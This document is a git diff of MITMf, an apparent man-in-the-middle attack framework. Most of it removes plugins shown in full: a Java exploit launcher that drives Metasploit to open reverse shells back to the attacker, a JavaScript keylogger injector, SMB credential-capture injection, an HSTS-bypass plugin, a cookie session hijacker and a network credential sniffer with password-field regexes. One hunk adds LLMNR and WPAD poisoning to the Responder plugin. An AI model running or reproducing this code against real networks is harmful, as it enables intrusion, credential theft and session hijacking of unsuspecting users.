- - def get_exploit(self, java_version): - exploits = [] - - client_vstring = java_version[:-len(java_version.split('.')[3])-1] - client_uversion = int(java_version.split('.')[3]) - - for ver in self.javacfg['Multi'].iteritems(): - if type(ver[1]) is list: - for list_vers in ver[1]: - - version_string = list_vers[:-len(list_vers.split('.')[3])-1] - update_version = int(list_vers.split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif (client_vstring == version_string): - if client_uversion <= update_version: - exploits.append(ver[0]) - else: - version_string = ver[1][:-len(ver[1].split('.')[3])-1] - update_version = int(ver[1].split('.')[3]) - - if ('*' in version_string[:1]) and (client_vstring == version_string[1:]): - if client_uversion == update_version: - exploits.append(ver[0]) - elif client_vstring == version_string: - if client_uversion <= update_version: - exploits.append(ver[0]) - - return exploits - - - def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions - #inject iframe - mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip) - self.html_payload = "" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects - - mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip) - - exit = False - i = 1 - while i <= 30: #wait max 60 seconds for a new shell - if exit: - break - shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions - if len(shell) > 0: - for k, v in shell.iteritems(): - if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted - mitmf_logger.info("%s >> Got shell!" % client_ip) - self.sploited_ips.append(client_ip) #target successfuly exploited :) - self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped - exit = True - break - sleep(2) - i += 1 - - if exit is False: #We didn't get a shell :( - mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip) - - self.html_payload = self.get_payload() # restart the BrowserProfiler plugin - - def send_command(self, cmd, msf, vic_ip): - try: - mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip) - - #Create a virtual console - console_id = msf.call('console.create')['id'] - - #write the cmd to the newly created console - msf.call('console.write', [console_id, cmd]) - - mitmf_logger.info("%s >> commands sent succesfully" % vic_ip) - except Exception, e: - mitmf_logger.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e)) - - def pwn(self, msf): - while True: - if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled - - brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format - - if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited - - vic_ip = brwprofile['ip'] - - mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version'])) - mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip) - - exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg - - if exploits: - - if len(exploits) > 1: - mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits))) - exploit = random.choice(exploits) - mitmf_logger.info("%s >> choosing %s" %(vic_ip, exploit)) - else: - mitmf_logger.info("%s >> client is vulnerable to %s!" % (vic_ip, exploits[0])) - exploit = exploits[0] - - #here we check to see if we already set up the exploit to avoid creating new jobs for no reason - jobs = msf.call('job.list') #get running jobs - if len(jobs) > 0: - for k, v in jobs.iteritems(): - info = msf.call('job.info', [k]) - if exploit in info['name']: - mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit)) - url = info['uripath'] #get the url assigned to the exploit - self.injectWait(msf, url, vic_ip) - - else: #here we setup the exploit - rand_port = random.randint(1000, 65535) #generate a random port for the payload listener - rand_url = self.rand_url() - #generate the command string to send to the virtual console - #new line character very important as it simulates a user pressing enter - cmd = "use exploit/%s\n" % exploit - cmd += "set SRVPORT %s\n" % self.msfport - cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform - cmd += "set LHOST %s\n" % self.msfip - cmd += "set LPORT %s\n" % rand_port - cmd += "exploit -j\n" - - mitmf_logger.debug("command string:\n%s" % cmd) - - self.send_command(cmd, msf, vic_ip) - - self.injectWait(msf, rand_url, vic_ip) - else: - #this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert) - mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip) - mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip) - - rand_url = self.rand_url() - rand_port = random.randint(1000, 65535) - - cmd = "use exploit/multi/browser/java_signed_applet\n" - cmd += "set SRVPORT %s\n" % self.msfport - cmd += "set URIPATH %s\n" % rand_url - cmd += "set PAYLOAD generic/shell_reverse_tcp\n" - cmd += "set LHOST %s\n" % self.msfip - cmd += "set LPORT %s\n" % rand_port - cmd += "exploit -j\n" - - self.send_command(cmd, msf, vic_ip) - self.injectWait(msf, rand_url, vic_ip) - sleep(1) diff --git a/plugins/JsKeylogger.py b/plugins/JsKeylogger.py deleted file mode 100644 index 8acfe96..0000000 --- a/plugins/JsKeylogger.py +++ /dev/null @@ -1,169 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -import logging - -mitmf_logger = logging.getLogger('mitmf') - -class jskeylogger(Inject, Plugin): - name = "Javascript Keylogger" - optname = "jskeylogger" - desc = "Injects a javascript keylogger into clients webpages" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" - has_opts = False - - def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.msf_keylogger() - - def sendPostData(self, request): - #Handle the plugin output - if 'keylog' in request.uri: - - raw_keys = request.postData.split("&&")[0] - keys = raw_keys.split(",") - del keys[0]; del(keys[len(keys)-1]) - - input_field = request.postData.split("&&")[1] - - nice = '' - for n in keys: - if n == '9': - nice += "" - elif n == '8': - nice = nice.replace(nice[-1:], "") - elif n == '13': - nice = '' - else: - try: - nice += n.decode('hex') - except: - mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n)) - - #try: - # input_field = input_field.decode('hex') - #except: - # mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field)) - - mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice)) - - def msf_keylogger(self): - #Stolen from the Metasploit module http_javascript_keylogger - - payload = """""" - - return payload \ No newline at end of file diff --git a/plugins/Replace.py b/plugins/Replace.py deleted file mode 100644 index f623736..0000000 --- a/plugins/Replace.py +++ /dev/null @@ -1,105 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -""" -Plugin by @rubenthijssen -""" - -import sys -import logging -import time -import re -from plugins.plugin import Plugin -from plugins.CacheKill import CacheKill - -mitmf_logger = logging.getLogger('mitmf') - -class Replace(CacheKill, Plugin): - name = "Replace" - optname = "replace" - desc = "Replace arbitrary content in HTML content" - implements = ["handleResponse", "handleHeader", "connectionMade"] - depends = ["CacheKill"] - version = "0.1" - has_opts = True - - def initialize(self, options): - self.options = options - - self.search_str = options.search_str - self.replace_str = options.replace_str - self.regex_file = options.regex_file - - if (self.search_str is None or self.search_str == "") and self.regex_file is None: - sys.exit("[-] Please provide a search string or a regex file") - - self.regexes = [] - if self.regex_file is not None: - for line in self.regex_file: - self.regexes.append(line.strip().split("\t")) - - if self.options.keep_cache: - self.implements.remove("handleHeader") - self.implements.remove("connectionMade") - - self.ctable = {} - self.dtable = {} - self.mime = "text/html" - - def handleResponse(self, request, data): - ip, hn, mime = self._get_req_info(request) - - if self._should_replace(ip, hn, mime): - - if self.search_str is not None and self.search_str != "": - data = data.replace(self.search_str, self.replace_str) - mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str)) - - # Did the user provide us with a regex file? - for regex in self.regexes: - try: - data = re.sub(regex[0], regex[1], data) - - mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) - except Exception: - logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1])) - - self.ctable[ip] = time.time() - self.dtable[ip+hn] = True - - return {'request': request, 'data': data} - - return - - def add_options(self, options): - options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)") - options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.") - options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: [tab][new-line]") - options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.") - - def _should_replace(self, ip, hn, mime): - return mime.find(self.mime) != -1 - - def _get_req_info(self, request): - ip = request.client.getClientIP() - hn = request.client.getRequestHostname() - mime = request.client.headers['Content-Type'] - - return (ip, hn, mime) diff --git a/plugins/Responder.py b/plugins/Responder.py index 81c0186..676553f 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -23,9 +23,10 @@ import os import threading from plugins.plugin import Plugin -from libs.responder.Responder import ResponderMITMf -from core.sslstrip.DnsCache import DnsCache from twisted.internet import reactor +from core.responder.wpad.WPADPoisoner import WPADPoisoner +from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner +from core.utils import SystemConfig class Responder(Plugin): name = "Responder" @@ -37,37 +38,32 @@ class Responder(Plugin): def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' - self.options = options + self.options = options self.interface = options.interface + self.ourip = SystemConfig.getIP(options.interface) try: - config = options.configfile['Responder'] + config = self.config['Responder'] except Exception, e: sys.exit('[-] Error parsing config for Responder: ' + str(e)) - if options.Analyze: + LLMNRPoisoner().start(options, self.ourip) + + if options.wpad: + WPADPoisoner().start() + + if options.analyze: self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned") - resp = ResponderMITMf() - resp.setCoreVars(options, config) - - result = resp.AnalyzeICMPRedirect() - if result: - for line in result: - self.tree_output.append(line) - - resp.printDebugInfo() - resp.start() - - def plugin_reactor(self, strippingFactory): + def pluginReactor(self, strippingFactory): reactor.listenTCP(3141, strippingFactory) def add_options(self, options): - options.add_argument('--analyze', dest="Analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") - options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") - options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") - options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") - options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False") - options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") - options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") + options.add_argument('--analyze', dest="analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning") + options.add_argument('--basic', dest="basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") + options.add_argument('--wredir', dest="wredir", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False") + options.add_argument('--nbtns', dest="nbtns", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False") + options.add_argument('--fingerprint', dest="finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query") + options.add_argument('--wpad', dest="wpad", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False") + options.add_argument('--forcewpadauth', dest="forceWpadAuth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") + options.add_argument('--lm', dest="lm", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False") diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py deleted file mode 100644 index a1df8fe..0000000 --- a/plugins/SMBAuth.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -from plugins.plugin import Plugin -from plugins.Inject import Inject -import sys -import logging - -class SMBAuth(Inject, Plugin): - name = "SMBAuth" - optname = "smbauth" - desc = "Evoke SMB challenge-response auth attempts" - depends = ["Inject"] - version = "0.1" - has_opts = True - - def initialize(self, options): - Inject.initialize(self, options) - self.target_ip = options.host - - if not self.target_ip: - self.target_ip = options.ip_address - - self.html_payload = self._get_data() - - def add_options(self, options): - options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]") - - def _get_data(self): - return ''\ - ''\ - '' % tuple([self.target_ip]*3) diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py deleted file mode 100644 index 282b909..0000000 --- a/plugins/SSLstrip+.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import sys -import logging - -from plugins.plugin import Plugin -from core.utils import IpTables -from core.sslstrip.URLMonitor import URLMonitor -from core.dnschef.dnschef import DNSChef - -class HSTSbypass(Plugin): - name = 'SSLstrip+' - optname = 'hsts' - desc = 'Enables SSLstrip+ for partial HSTS bypass' - version = "0.4" - tree_output = ["SSLstrip+ by Leonardo Nve running"] - has_opts = False - - def initialize(self, options): - self.options = options - self.manualiptables = options.manualiptables - - try: - hstsconfig = options.configfile['SSLstrip+'] - except Exception, e: - sys.exit("[-] Error parsing config for SSLstrip+: " + str(e)) - - if not options.manualiptables: - if IpTables.getInstance().dns is False: - IpTables.getInstance().DNS(options.ip_address, options.configfile['MITMf']['DNS']['port']) - - URLMonitor.getInstance().setHstsBypass(hstsconfig) - DNSChef.getInstance().setHstsBypass(hstsconfig) - - def finish(self): - if not self.manualiptables: - if IpTables.getInstance().dns is True: - IpTables.getInstance().Flush() \ No newline at end of file diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py deleted file mode 100644 index ff9a3ec..0000000 --- a/plugins/SessionHijacker.py +++ /dev/null @@ -1,187 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb - -from plugins.plugin import Plugin -from core.publicsuffix.publicsuffix import PublicSuffixList -from urlparse import urlparse -import threading -import os -import sys -import time -import logging -import sqlite3 -import json -import socket - -mitmf_logger = logging.getLogger('mitmf') - -class SessionHijacker(Plugin): - name = "Session Hijacker" - optname = "hijack" - desc = "Performs session hijacking attacks against clients" - implements = ["cleanHeaders"] #["handleHeader"] - version = "0.1" - has_opts = True - - def initialize(self, options): - '''Called if plugin is enabled, passed the options namespace''' - self.options = options - self.psl = PublicSuffixList() - self.firefox = options.firefox - self.mallory = options.mallory - self.save_dir = "./logs" - self.seen_hosts = {} - self.sql_conns = {} - self.sessions = [] - self.html_header="

Cookies sniffed for the following domains\n
\n
" - - #Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires - #SQLite version 3.7.0 or later. You won't be able to read the database files - #with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted - #or is not a database" message. - - sqlv = sqlite3.sqlite_version.split('.') - if (sqlv[0] <3 or sqlv[1] < 7): - sys.exit("[-] sqlite3 version 3.7 or greater required") - - if not os.path.exists("./logs"): - os.makedirs("./logs") - - if self.mallory: - t = threading.Thread(name='mallory_server', target=self.mallory_server, args=()) - t.setDaemon(True) - t.start() - - def cleanHeaders(self, request): # Client => Server - headers = request.getAllHeaders().copy() - client_ip = request.getClientIP() - - if 'cookie' in headers: - - if self.firefox: - url = "http://" + headers['host'] + request.getPathFromUri() - for cookie in headers['cookie'].split(';'): - eq = cookie.find("=") - cname = str(cookie)[0:eq].strip() - cvalue = str(cookie)[eq+1:].strip() - self.firefoxdb(headers['host'], cname, cvalue, url, client_ip) - - mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip) - - if self.mallory: - if len(self.sessions) > 0: - temp = [] - for session in self.sessions: - temp.append(session[0]) - if headers['host'] not in temp: - self.sessions.append((headers['host'], headers['cookie'])) - mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) - mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) - else: - self.sessions.append((headers['host'], headers['cookie'])) - mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie'])) - mitmf_logger.info("%s Sent cookie to browser extension" % client_ip) - - #def handleHeader(self, request, key, value): # Server => Client - # if 'set-cookie' in request.client.headers: - # cookie = request.client.headers['set-cookie'] - # #host = request.client.headers['host'] #wtf???? - # message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie) - # if self.urlMonitor.isClientLogging() is True: - # self.urlMonitor.writeClientLog(request.client, request.client.headers, message) - # else: - # mitmf_logger.info(message) - - def mallory_server(self): - host = '' - port = 20666 - server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - server.bind((host,port)) - server.listen(1) - while True: - client, addr = server.accept() - if addr[0] != "127.0.0.1": - client.send("Hacked By China!") - client.close() - continue - request = client.recv(8192) - request = request.split('\n') - path = request[0].split()[1] - client.send("HTTP/1.0 200 OK\r\n") - client.send("Content-Type: text/html\r\n\r\n") - if path == "/": - client.send(json.dumps(self.sessions)) - client.close() - - def firefoxdb(self, host, cookie_name, cookie_value, url, ip): - - session_dir=self.save_dir + "/" + ip - cookie_file=session_dir +'/cookies.sqlite' - cookie_file_exists = os.path.exists(cookie_file) - - if (ip not in (self.sql_conns and os.listdir("./logs"))): - - try: - if not os.path.exists(session_dir): - os.makedirs(session_dir) - - db = sqlite3.connect(cookie_file, isolation_level=None) - self.sql_conns[ip] = db.cursor() - - if not cookie_file_exists: - self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))") - self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)") - except Exception, e: - print str(e) - - scheme = urlparse(url).scheme - scheme = (urlparse(url).scheme) - basedomain = self.psl.get_public_suffix(host) - address = urlparse(url).hostname - short_url = scheme + "://"+ address - - log = open(session_dir + '/visited.html','a') - if (ip not in self.seen_hosts): - self.seen_hosts[ip] = {} - log.write(self.html_header) - - if (address not in self.seen_hosts[ip]): - self.seen_hosts[ip][address] = 1 - log.write("\n
\n%s" %(short_url, address)) - - log.close() - - if address == basedomain: - address = "." + address - - expire_date = 2000000000 #Year2033 - now = int(time.time()) - 600 - self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain,cookie_name,cookie_value,address,'/',expire_date,now,now,0,0)) - - def add_options(self, options): - options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies') - options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension') - - def finish(self): - if self.firefox: - print "\n[*] To load a session run: 'firefox -profile logs//visited.html'" \ No newline at end of file diff --git a/plugins/Sniffer.py b/plugins/Sniffer.py deleted file mode 100644 index ca0ba51..0000000 --- a/plugins/Sniffer.py +++ /dev/null @@ -1,815 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -#This is a MITMf port of net-creds https://github.com/DanMcInerney/net-creds - -from plugins.plugin import Plugin -import logging -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) -from scapy.all import * -from sys import exit -from collections import OrderedDict -from StringIO import StringIO -import binascii -import struct -import pcap -import base64 -import threading -import re -import os - -mitmf_logger = logging.getLogger('mitmf') - -class Sniffer(Plugin): - name = "Sniffer" - optname = "sniffer" - desc = "Sniffs for various protocol login and auth attempts" - tree_output = ["Net-Creds online"] - implements = ["sendRequest"] - version = "0.1" - has_opts = False - - def initialize(self, options): - self.options = options - self.interface = options.interface - #self.parse = options.parse - - #these field names were stolen from the etter.fields file (Ettercap Project) - self.http_userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name', - 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', - 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', - 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', - 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] - - self.http_passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', - 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' - 'passwort', 'passwrd', 'wppassword', 'upasswd'] - - if os.geteuid() != 0: - sys.exit("[-] Sniffer plugin requires root privileges") - - n = NetCreds() - #if not self.parse: - t = threading.Thread(name="sniffer", target=n.start, args=(self.interface,)) - t.setDaemon(True) - t.start() - - #else: - # pcap = rdpcap(self.parse) - # for pkt in pcap: - # n.pkt_parser(pkt) - - #def add_options(self, options): - # options.add_argument('--parse', dest='parse', type=str, default=None, help='Parse pcap') - - def sendRequest(self, request): - #Capture google searches - if ('google' in request.headers['host']): - if ('search' in request.uri): - self.captureQueries('q', request) - - #Capture bing searches - if ('bing' in request.headers['host']): - if ('Suggestions' in request.uri): - self.captureQueries('qry', request) - - #Capture yahoo searches - if ('search.yahoo' in request.headers['host']): - if ('nresults' in request.uri): - self.captureQueries('command', request) - - self.captureURLCreds(request) - - def captureQueries(self, search_param, request): - try: - for param in request.uri.split('&'): - if param.split('=')[0] == search_param: - query = str(param.split('=')[1]) - if query: - mitmf_logger.info(request.clientInfo + "is querying %s for: %s" % (request.headers['host'], query)) - except Exception, e: - error = str(e) - mitmf_logger.warning(request.clientInfo + "Error parsing search query %s" % error) - - def captureURLCreds(self, request): - ''' - checks for creds passed via GET requests or just in the url - It's surprising to see how many people still do this (please stahp) - ''' - - url = request.uri - - username = None - password = None - for user in self.http_userfields: - #search = re.findall("("+ user +")=([^&|;]*)", request.uri, re.IGNORECASE) - search = re.search('(%s=[^&]+)' % user, url, re.IGNORECASE) - if search: - username = search.group() - - for passw in self.http_passfields: - #search = re.findall("(" + passw + ")=([^&|;]*)", request.uri, re.IGNORECASE) - search = re.search('(%s=[^&]+)' % passw, url, re.IGNORECASE) - if search: - password = search.group() - - if (username and password): - mitmf_logger.warning(request.clientInfo + "Possible Credentials (Method: %s, Host: %s):\n%s" % (request.command, request.headers['host'], url)) - -class NetCreds: - - def __init__(self): - self.pkt_frag_loads = OrderedDict() - self.challenge_acks = OrderedDict() - self.mail_auths = OrderedDict() - self.telnet_stream = OrderedDict() - - # Regexs - self.authenticate_re = '(www-|proxy-)?authenticate' - self.authorization_re = '(www-|proxy-)?authorization' - self.ftp_user_re = r'USER (.+)\r\n' - self.ftp_pw_re = r'PASS (.+)\r\n' - self.irc_user_re = r'NICK (.+?)((\r)?\n|\s)' - self.irc_pw_re = r'NS IDENTIFY (.+)' - self.mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)' - self.mail_auth_re1 = '(\d+ )?login ' - self.NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+' - self.NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+' - - def start(self, interface): - try: - sniff(iface=interface, prn=self.pkt_parser, store=0) - except Exception: - pass - - def frag_remover(self, ack, load): - ''' - Keep the FILO OrderedDict of frag loads from getting too large - 3 points of limit: - Number of ip_ports < 50 - Number of acks per ip:port < 25 - Number of chars in load < 5000 - ''' - - # Keep the number of IP:port mappings below 50 - # last=False pops the oldest item rather than the latest - while len(self.pkt_frag_loads) > 50: - self.pkt_frag_loads.popitem(last=False) - - # Loop through a deep copy dict but modify the original dict - copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - if len(copy_pkt_frag_loads[ip_port]) > 0: - # Keep 25 ack:load's per ip:port - while len(copy_pkt_frag_loads[ip_port]) > 25: - self.pkt_frag_loads[ip_port].popitem(last=False) - - # Recopy the new dict to prevent KeyErrors for modifying dict in loop - copy_pkt_frag_loads = copy.deepcopy(self.pkt_frag_loads) - for ip_port in copy_pkt_frag_loads: - # Keep the load less than 75,000 chars - for ack in copy_pkt_frag_loads[ip_port]: - # If load > 5000 chars, just keep the last 200 chars - if len(copy_pkt_frag_loads[ip_port][ack]) > 5000: - self.pkt_frag_loads[ip_port][ack] = self.pkt_frag_loads[ip_port][ack][-200:] - - def frag_joiner(self, ack, src_ip_port, load): - ''' - Keep a store of previous fragments in an OrderedDict named pkt_frag_loads - ''' - for ip_port in self.pkt_frag_loads: - if src_ip_port == ip_port: - if ack in self.pkt_frag_loads[src_ip_port]: - # Make pkt_frag_loads[src_ip_port][ack] = full load - old_load = self.pkt_frag_loads[src_ip_port][ack] - concat_load = old_load + load - return OrderedDict([(ack, concat_load)]) - - return OrderedDict([(ack, load)]) - - def pkt_parser(self, pkt): - ''' - Start parsing packets here - ''' - - if pkt.haslayer(Raw): - load = pkt[Raw].load - - # Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control - if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6): - return 